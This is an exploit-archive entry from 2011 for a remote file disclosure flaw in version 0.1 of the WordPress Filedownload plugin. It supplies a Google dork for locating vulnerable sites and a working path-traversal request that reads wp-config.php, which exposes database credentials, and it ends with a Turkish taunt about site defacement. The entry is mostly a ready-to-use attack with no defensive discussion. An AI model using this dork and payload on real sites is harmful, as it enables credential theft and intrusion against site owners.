WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability



EKU-ID: 1009 CVE: OSVDB-ID:
Author: Septemb0x Published: 2011-09-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability
# Google Dork: inurl:"/wp-content/plugins/filedownload/download.php/?path"
# Date: 18-09-2011
# Author: Septemb0x ( CYBER-WARRIOR )
# Software Link: http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
# Version: 0.1


POC : /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
     

# NOTE: Kendini Birþey Zanneden Velet  Senin Hiç Böyle Bug'n Oldumu ki Sitelerime Ýndex Basasýn? Öptüm Büyüde Gel.